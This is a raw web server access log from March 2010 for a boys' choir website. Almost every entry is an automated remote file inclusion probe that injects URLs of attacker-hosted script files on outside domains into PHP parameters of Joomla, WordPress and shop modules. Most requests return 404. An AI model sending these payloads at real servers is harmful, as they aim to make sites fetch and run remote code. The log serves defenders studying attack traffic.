116.40.122.117 - - [09/Mar/2010:07:21:53 -0800] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:21:53 -0800] "GET /logs/access_100112.log//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:07:23:22 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:23:38 -0800] "GET /logs/access_100131.log/modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:07:24:00 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:24:05 -0800] "GET /logs/access_100131.log/modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
207.46.199.189 - - [09/Mar/2010:07:26:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:07:27:40 -0800] "GET /logs/?N=A HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:27:52 -0800] "GET /logs/access_100112.log%20%20////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:27:52 -0800] "GET ///////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1729 "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:27:52 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1092 "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:29:28 -0800] "GET ///////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1729 "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:29:29 -0800] "GET /logs/access_100112.log%20%20////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:29:29 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1092 "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:29:56 -0800] "GET /logs/access_091213.log%20%20////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:31:16 -0800] "GET /logs/access_091213.log%20%20////////?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:31:19 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:31:19 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:31:19 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:34 -0800] "GET /logs/access_091029.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:34 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:34 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:41 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:41 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:41 -0800] "GET /logs/access_091029.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:44 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:44 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:31:44 -0800] "GET /logs/access_091029.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:32:23 -0800] "GET /logs/access_100116.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:32:32 -0800] "GET /logs/access_100116.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:07:32:39 -0800] "GET /logs/access_100116.log%20%20//twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:07:32:39 -0800] "GET //skin/rosun2005GL_GALLERY/setup.php?dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:07:32:39 -0800] "GET /logs/access_090915.log///skin/rosun2005GL_GALLERY/setup.php?dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.133.164.82 - - [09/Mar/2010:07:32:39 -0800] "GET /logs///skin/rosun2005GL_GALLERY/setup.php?dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:33:35 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:33:35 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:33:35 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:33:55 -0800] "GET /logs/access_100209.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:34:17 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:34:17 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:34:17 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:34:31 -0800] "GET /logs/access_100209.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:35:45 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:35:45 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:35:46 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:35:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:35:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:35:51 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:36:16 -0800] "GET /logs/access_091029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:36:16 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:36:16 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:36:45 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:36:55 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:37:54 -0800] "GET /logs/access_100116.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:38:31 -0800] "GET //include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:38:31 -0800] "GET /logs/access_100130.log%20%20///include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:38:31 -0800] "GET /logs///include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:39:40 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:39:40 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:40:03 -0800] "GET /logs/access_100214.log%20%20///include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:07:40:21 -0800] "GET /logs/access_091111.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:07:40:21 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:07:40:21 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:07:40:35 -0800] "GET /logs/access_100214.log//xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:07:40:36 -0800] "GET /logs/access_100115.log//xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:07:40:36 -0800] "GET /xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.114.112.155 - - [09/Mar/2010:07:40:36 -0800] "GET /logs//xfsection/modify.php?dir_module=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:40:56 -0800] "GET /logs///include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:40:56 -0800] "GET //include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:40:59 -0800] "GET /logs/access_100130.log///include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:42:19 -0800] "GET /logs/access_100214.log///include/logout.php?PSA_PATH=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:42:29 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:42:42 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.phpmosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:43:47 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
151.8.79.19 - - [09/Mar/2010:07:44:29 -0800] "GET /advanced_comment_system/admin.php?ACS_path=http://www.barcamenando.it/open.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
151.8.79.19 - - [09/Mar/2010:07:44:29 -0800] "GET /logs/access_100217.log//advanced_comment_system/admin.php?ACS_path=http://www.barcamenando.it/open.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
151.8.79.19 - - [09/Mar/2010:07:44:29 -0800] "GET /logs//advanced_comment_system/admin.php?ACS_path=http://www.barcamenando.it/open.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:46:03 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:35 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:35 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:35 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:40 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:40 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:40 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:40 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:40 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:40 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:49 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:49 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:47:49 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:02 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:02 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:02 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:12 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:12 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
